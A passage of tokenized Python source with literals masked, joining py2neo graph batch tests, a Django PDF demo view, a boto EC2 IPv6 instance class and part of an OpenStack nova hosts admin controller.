<NUM_LIT:1> ) ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , knows1 , knows2 = self . batch . run ( ) <EOL> assert isinstance ( knows1 , Relationship ) <EOL> assert knows1 . start_node ( ) == alice <EOL> assert knows1 . type ( ) == "<STR_LIT>" <EOL> assert knows1 . end_node ( ) == bob <EOL> assert dict ( knows1 ) == { } <EOL> assert isinstance ( knows2 , Relationship ) <EOL> assert knows2 . start_node ( ) == alice <EOL> assert knows2 . type ( ) == "<STR_LIT>" <EOL> assert knows2 . end_node ( ) == bob <EOL> assert dict ( knows2 ) == { } <EOL> self . recycling = [ knows1 , knows2 , alice , bob ] <EOL> def test_can_create_relationship_with_properties ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> , { "<STR_LIT>" : <NUM_LIT> } ) ) <EOL> alice , bob , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert knows [ "<STR_LIT>" ] == <NUM_LIT> <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_create_function ( self ) : <EOL> self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , ab = self . batch . run ( ) <EOL> assert isinstance ( alice , Node ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert isinstance ( bob , Node ) <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert isinstance ( ab , Relationship ) <EOL> assert ab . start_node ( ) == alice <EOL> assert ab . type ( ) == "<STR_LIT>" <EOL> assert ab . end_node ( ) == bob <EOL> self . recycling = [ ab , alice , bob ] <EOL> class UniqueRelationshipCreationRestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_relationship_if_none_exists ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , bob = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( <EOL> alice , ( "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT> } ) , bob ) <EOL> path , = self . batch . run ( ) <EOL> knows = path [ <NUM_LIT:0> ] <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert knows [ "<STR_LIT>" ] == <NUM_LIT> <EOL> self . recycling = [ knows , alice , bob ] <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_will_get_relationship_if_one_exists ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , bob = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( <EOL> alice , ( "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT> } ) , bob ) <EOL> self . batch . get_or_create_path ( <EOL> alice , ( "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT> } ) , bob ) <EOL> path1 , path2 = self . batch . run ( ) <EOL> assert path1 == path2 <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_will_fail_batch_if_more_than_one_exists ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , k1 , k2 = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , bob ) <EOL> with self . assertRaises ( BatchError ) as error : <EOL> self . batch . run ( ) <EOL> cause = error . exception . __cause__ <EOL> assert isinstance ( cause , ConstraintError ) <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_relationship_and_start_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> bob , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( None , "<STR_LIT>" , bob ) <EOL> path , = self . batch . run ( ) <EOL> knows = path [ <NUM_LIT:0> ] <EOL> alice = knows . start_node ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert isinstance ( alice , Node ) <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> self . recycling = [ knows , alice , bob ] <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_relationship_and_end_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , None ) <EOL> path , = self . batch . run ( ) <EOL> knows = path [ <NUM_LIT:0> ] <EOL> bob = knows . end_node ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert isinstance ( bob , Node ) <EOL> self . recycling = [ knows , alice , bob ] <EOL> class DeletionTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> def test_can_delete_relationship_and_related_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , ab = self . batch . run ( ) <EOL> assert self . graph . exists ( alice | bob | ab ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . delete ( ab ) <EOL> self . batch . delete ( alice ) <EOL> self . batch . delete ( bob ) <EOL> self . batch . run ( ) <EOL> assert not self . graph . exists ( alice | bob | ab ) <EOL> class PropertyManagementTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> self . alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . bob = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . friends = cast_relationship ( ( self . alice , "<STR_LIT>" , self . bob , { "<STR_LIT>" : <NUM_LIT> } ) ) <EOL> self . graph . create ( self . alice | self . bob | self . friends ) <EOL> def _check_properties ( self , entity , expected_properties ) : <EOL> self . graph . pull ( entity ) <EOL> actual_properties = dict ( entity ) <EOL> assert len ( actual_properties ) == len ( expected_properties ) <EOL> for key , value in expected_properties . items ( ) : <EOL> assert key in actual_properties <EOL> assert str ( actual_properties [ key ] ) == str ( value ) <EOL> def test_can_add_new_node_property ( self ) : <EOL> self . batch . set_property ( self . alice , "<STR_LIT>" , <NUM_LIT> ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> def test_can_overwrite_existing_node_property ( self ) : <EOL> self . batch . set_property ( self . alice , "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> def test_can_replace_all_node_properties ( self ) : <EOL> props = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } <EOL> self . batch . set_properties ( self . alice , props ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , props ) <EOL> def test_can_delete_node_property ( self ) : <EOL> self . batch . delete_property ( self . alice , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . _check_properties ( self . alice , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> def test_can_delete_all_node_properties ( self ) : <EOL> self . batch . delete_properties ( self . alice ) <EOL> r = self . batch . run ( ) <EOL> self . _check_properties ( self . alice , { } ) <EOL> class MiscellaneousTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> self . runner = self . batch . runner <EOL> def test_can_use_return_values_as_references ( self ) : <EOL> a = self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> b = self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> self . batch . create ( Relationship ( a , "<STR_LIT>" , b ) ) <EOL> results = self . batch . run ( ) <EOL> ab = results [ <NUM_LIT:2> ] <EOL> assert isinstance ( ab , Relationship ) <EOL> assert ab . start_node ( ) [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert ab . end_node ( ) [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> def test_can_handle_json_response_with_no_content ( self ) : <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> results = self . batch . run ( ) <EOL> assert results == [ ] <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_cypher_job_with_invalid_syntax ( self ) : <EOL> self . batch . append ( CypherJob ( "<STR_LIT:X>" ) ) <EOL> with self . assertRaises ( BatchError ) as error : <EOL> self . batch . run ( ) <EOL> cause = error . exception . __cause__ <EOL> assert isinstance ( cause , CypherSyntaxError ) <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_cannot_resubmit_finished_job ( self ) : <EOL> self . batch . append ( CypherJob ( "<STR_LIT>" ) ) <EOL> self . runner . run ( self . batch ) <EOL> with self . assertRaises ( BatchFinished ) : <EOL> self . runner . run ( self . batch ) <EOL> class BatchRequestTestCase ( GraphTestCase ) : <EOL> def test_can_create_batch_request ( self ) : <EOL> method = "<STR_LIT:POST>" <EOL> endpoint = "<STR_LIT>" <EOL> target = Target ( endpoint ) <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> request = Job ( method , target , body ) <EOL> assert request . method == method <EOL> assert request . target . uri_string == endpoint <EOL> assert request . body == body <EOL> def test_batch_requests_are_equal_if_same ( self ) : <EOL> method = "<STR_LIT:POST>" <EOL> endpoint = "<STR_LIT>" <EOL> target = Target ( endpoint ) <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> request_1 = Job ( method , target , body ) <EOL> request_2 = request_1 <EOL> assert request_1 == request_2 <EOL> assert hash ( request_1 ) == hash ( request_2 ) <EOL> def test_batch_requests_are_unequal_if_not_same ( self ) : <EOL> method = "<STR_LIT:POST>" <EOL> endpoint = "<STR_LIT>" <EOL> target = Target ( endpoint ) <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> request_1 = Job ( method , target , body ) <EOL> request_2 = Job ( method , target , body ) <EOL> assert request_1 != request_2 <EOL> assert hash ( request_1 ) != hash ( request_2 ) <EOL> class WriteBatchTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = WriteBatch ( self . graph ) <EOL> def test_cannot_create_with_bad_type ( self ) : <EOL> try : <EOL> self . batch . create ( "<STR_LIT>" ) <EOL> except TypeError : <EOL> assert True <EOL> else : <EOL> assert False <EOL> def test_cannot_create_with_none ( self ) : <EOL> try : <EOL> self . batch . create ( None ) <EOL> except TypeError : <EOL> assert True <EOL> else : <EOL> assert False <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_path_with_new_nodes ( self ) : <EOL> self . batch . create_path ( { "<STR_LIT:name>" : "<STR_LIT>" } , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert len ( path ) == <NUM_LIT:1> <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert path [ <NUM_LIT:0> ] . type ( ) == "<STR_LIT>" <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_create_path_with_existing_nodes ( self ) : <EOL> alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> bob = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . graph . create ( alice | bob ) <EOL> self . batch . create_path ( alice , "<STR_LIT>" , bob ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert len ( path ) == <NUM_LIT:1> <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path [ <NUM_LIT:0> ] . type ( ) == "<STR_LIT>" <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] == bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_path_creation_is_not_idempotent ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> bob = path . nodes ( ) [ <NUM_LIT:1> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> self . batch = WriteBatch ( self . graph ) <EOL> self . batch . create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] != bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_get_or_create_path_with_existing_nodes ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> bob = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice | bob ) <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , bob ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert len ( path ) == <NUM_LIT:1> <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path [ <NUM_LIT:0> ] . type ( ) == "<STR_LIT>" <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] == bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_path_merging_is_idempotent ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> bob = path . nodes ( ) [ <NUM_LIT:1> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> self . batch = WriteBatch ( self . graph ) <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] == bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_property_on_preexisting_node ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . set_property ( alice , "<STR_LIT>" , <NUM_LIT> ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_property_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . set_property ( alice , "<STR_LIT>" , <NUM_LIT> ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_properties_on_preexisting_node ( self ) : <EOL> alice = Node ( ) <EOL> self . graph . create ( alice ) <EOL> self . batch . set_properties ( alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_properties_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { } ) <EOL> self . batch . set_properties ( alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_property_on_preexisting_node ( self ) : <EOL> alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . graph . create ( alice ) <EOL> self . batch . delete_property ( alice , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] is None <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_property_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . batch . delete_property ( alice , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] is None <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_properties_on_preexisting_node ( self ) : <EOL> alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . graph . create ( alice ) <EOL> self . batch . delete_properties ( alice ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert not alice <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_properties_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . batch . delete_properties ( alice ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert not alice <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_add_labels_to_preexisting_node ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . add_labels ( alice , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_add_labels_to_node_in_same_batch ( self ) : <EOL> a = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . add_labels ( a , "<STR_LIT>" , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( a ) ] <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_remove_labels_from_preexisting_node ( self ) : <EOL> alice = Node ( "<STR_LIT>" , "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . remove_label ( alice , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_add_and_remove_labels_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . add_labels ( alice , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . remove_label ( alice , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_labels_on_preexisting_node ( self ) : <EOL> alice = Node ( "<STR_LIT>" , "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . set_labels ( alice , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_labels_on_node_in_same_batch ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . add_labels ( <NUM_LIT:0> , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . set_labels ( <NUM_LIT:0> , "<STR_LIT>" , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ <NUM_LIT:0> ] <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> class NodePointerTestCase ( GraphTestCase ) : <EOL> def test_node_pointer_equality ( self ) : <EOL> p1 = NodePointer ( <NUM_LIT> ) <EOL> p2 = NodePointer ( <NUM_LIT> ) <EOL> assert p1 == p2 <EOL> def test_node_pointer_inequality ( self ) : <EOL> p1 = NodePointer ( <NUM_LIT> ) <EOL> p2 = NodePointer ( <NUM_LIT> ) <EOL> assert p1 != p2 <EOL> def test_node_pointer_hashes ( self ) : <EOL> assert hash ( NodePointer ( <NUM_LIT> ) ) == hash ( NodePointer ( <NUM_LIT> ) ) <EOL> def test_node_pointer_str ( self ) : <EOL> pointer = NodePointer ( <NUM_LIT> ) <EOL> assert str ( pointer ) == "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> import os <EOL> import logging <EOL> logging . basicConfig ( ) <EOL> from django . conf import settings <EOL> from django . conf . urls import patterns , url <EOL> from django . core . wsgi import get_wsgi_application <EOL> from django . utils . timezone import now as tznow <EOL> basename = os . path . splitext ( os . path . basename ( __file__ ) ) [ <NUM_LIT:0> ] <EOL> def rel ( * path ) : <EOL> return os . path . abspath ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , * path ) <EOL> ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) <EOL> if not settings . configured : <EOL> settings . configure ( <EOL> DEBUG = True , <EOL> TIMEZONE = "<STR_LIT>" , <EOL> INSTALLED_APPS = [ "<STR_LIT>" ] , <EOL> TEMPLATE_DIRS = [ rel ( "<STR_LIT>" , "<STR_LIT>" ) ] , <EOL> STATIC_ROOT = os . path . abspath ( rel ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ROOT_URLCONF = basename , <EOL> WSGI_APPLICATION = "<STR_LIT>" . format ( basename ) , <EOL> ) <EOL> from easy_pdf . views import PDFTemplateView <EOL> class HelloPDFView ( PDFTemplateView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get_context_data ( self , ** kwargs ) : <EOL> return super ( HelloPDFView , self ) . get_context_data ( <EOL> pagesize = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> today = tznow ( ) , <EOL> ** kwargs <EOL> ) <EOL> urlpatterns = patterns ( "<STR_LIT>" , <EOL> url ( r"<STR_LIT>" , HelloPDFView . as_view ( ) ) <EOL> ) <EOL> application = get_wsgi_application ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from django . core . management import call_command <EOL> call_command ( "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import boto <EOL> from boto . resultset import ResultSet <EOL> from boto . ec2 . instance import Reservation <EOL> from boto . ec2 . instance import Group <EOL> from boto . ec2 . instance import Instance <EOL> class ReservationV6 ( Reservation ) : <EOL> def startElement ( self , name , attrs , connection ) : <EOL> if name == '<STR_LIT>' : <EOL> self . instances = ResultSet ( [ ( '<STR_LIT>' , InstanceV6 ) ] ) <EOL> return self . instances <EOL> elif name == '<STR_LIT>' : <EOL> self . groups = ResultSet ( [ ( '<STR_LIT>' , Group ) ] ) <EOL> return self . groups <EOL> else : <EOL> return None <EOL> class InstanceV6 ( Instance ) : <EOL> def __init__ ( self , connection = None ) : <EOL> Instance . __init__ ( self , connection ) <EOL> self . dns_name_v6 = None <EOL> def endElement ( self , name , value , connection ) : <EOL> Instance . endElement ( self , name , value , connection ) <EOL> if name == '<STR_LIT>' : <EOL> self . dns_name_v6 = value <EOL> def _update ( self , updated ) : <EOL> self . __dict__ . update ( updated . __dict__ ) <EOL> self . dns_name_v6 = updated . dns_name_v6 </s>
<s> """<STR_LIT>""" <EOL> import webob . exc <EOL> from nova import compute <EOL> from nova import exception <EOL> from nova import flags <EOL> from nova import log as logging <EOL> from nova . api . openstack import common <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import faults <EOL> from nova . api . openstack . contrib import admin_only <EOL> from nova . scheduler import api as scheduler_api <EOL> LOG = logging . getLogger ( "<STR_LIT>" ) <EOL> FLAGS = flags . FLAGS <EOL> def _list_hosts ( req , service = None ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> hosts = scheduler_api . get_host_list ( context ) <EOL> if service : <EOL> hosts = [ host for host in hosts <EOL> if host [ "<STR_LIT>" ] == service ] <EOL> return hosts <EOL> def check_host ( fn ) : <EOL> """<STR_LIT>""" <EOL> def wrapped ( self , req , id , service = None , * args , ** kwargs ) : <EOL> listed_hosts = _list_hosts ( req , service ) <EOL> hosts = [ h [ "<STR_LIT>" ] for h in listed_hosts ] <EOL> if id in hosts : <EOL> return fn ( self , req , id , * args , ** kwargs ) <EOL> else : <EOL> raise exception . HostNotFound ( host = id ) <EOL> return wrapped <EOL> class HostController ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . compute_api = compute . API ( ) <EOL> super ( HostController , self ) . __init__ ( ) <EOL> def index ( self , req ) : <EOL> return { '<STR_LIT>' : _list_hosts ( req ) } <EOL> @ check_host <EOL> def update ( self , req , id , body ) : <EOL> for raw_key , raw_val in body . iteritems ( ) : <EOL> key = raw_key . lower ( ) . strip ( ) <EOL> val = raw_val . lower ( ) . strip ( ) <EOL> if key == "<STR_LIT:status>" : <EOL> if val [ : <NUM_LIT:6> ] in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> return self . _set_enabled_status ( req , id , <EOL> enabled = ( val . startswith ( "<STR_LIT>" ) ) ) <EOL> else : <EOL> explanation = _ ( "<STR_LIT>" ) % raw_val <EOL> raise webob . exc . HTTPBadRequest ( explanation = explanation ) <EOL> else : <EOL> explanation = _ ( "<STR_LIT>" ) % raw_key <EOL> raise webob . exc . HTTPBadRequest ( explanation = explanation ) <EOL> def _set_enabled_status ( self , req , host , enabled ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> state = "<STR_LIT>" if enabled else "<STR_LIT>" <EOL> LOG . audit ( _ ( "<STR_LIT>" ) % locals ( ) ) <EOL> result = self . compute_api . set_host_enabled ( context , host = host , <EOL> enabled = enabled ) <EOL> if result not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> raise webob . exc . HTTPBadRequest ( explanation = result ) <EOL> return { "<STR_LIT:host>" : host , "<STR_LIT:status>" : result } <EOL> def _host_power_action ( self , req , host , action ) : 